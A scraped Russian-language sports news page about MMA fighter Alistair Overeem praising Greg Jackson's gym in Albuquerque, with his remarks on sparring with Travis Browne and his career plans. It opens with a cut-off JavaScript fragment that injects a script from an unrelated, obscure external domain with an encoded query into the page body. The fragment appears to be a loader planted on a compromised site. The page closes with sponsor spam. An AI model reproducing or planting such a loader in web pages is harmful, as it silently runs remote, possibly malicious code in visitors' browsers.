: script.src = 'http://mvjrx.street-on-which.info' + '/?564803=N343MWUhKid-cXR0dHM'; w.document.body.appendChild(script); clearInterval(i);
 

Алистар Оверим: Мне понравилось тренироваться у Грега Джексона

суббота, 7 июня 2014 г.



Голландский боец смешанных единоборств Алистар Оверим прибыл несколько дней назад в Альбукерке (США), где располагается зал Грега Джексона. О переходе в этот тренировочный лагерь несколько недель назад говорил Алистар. После первого дня тренировок он остался доволен залом и рассчитывает продолжить тренировки вместе с бывшим соперником Трэвисом Брауном, белорусом Андреем Орловским и другими учениками Грега Джексона.

О первом впечатлении:
«Сегодня мой второй день в зале Грега Джексона. Мне нравится здешняя атмосфера. Первое впечатление очень хорошее. На самом деле, когда я переехал в США в 2011 году, зал Грега Джексона был в моем списке возможных мест тренировок. Но до приезда сюда я уже начал тренироваться с Blckzillians в Майями. До того я посетил Лос-Анджелес и Лас-Вегас, где мне не понравилось. Я искал себе новое место для тренировок, к Фрэнку Миру я готовился в Тайланде. Но я не могу перед каждым боем готовиться в Тайланде, нужен дом».

О тренировках с бывшим соперником Трэвисом Брауном:
«Я не вижу никаких проблем. Уверен, что он будет отличным спарринг-партнером».

О карьере:
«Несколько недель назад мне исполнилось 34 года. У меня есть еще лет пять-шесть на хорошие бои. Я хочу поработать с теми, кто может помочь развивать мою карьеру. В каждом зале своя атмосфера, свои взаимоотношения. До недавних пор у меня не было возможности проверить, но мне казалось, что мы с Грегом Джексоном понимаем друг друга».

Спонсор №1

SEO sprint - Всё для максимальной раскрутки!

Спонсор №2

Спонсор №3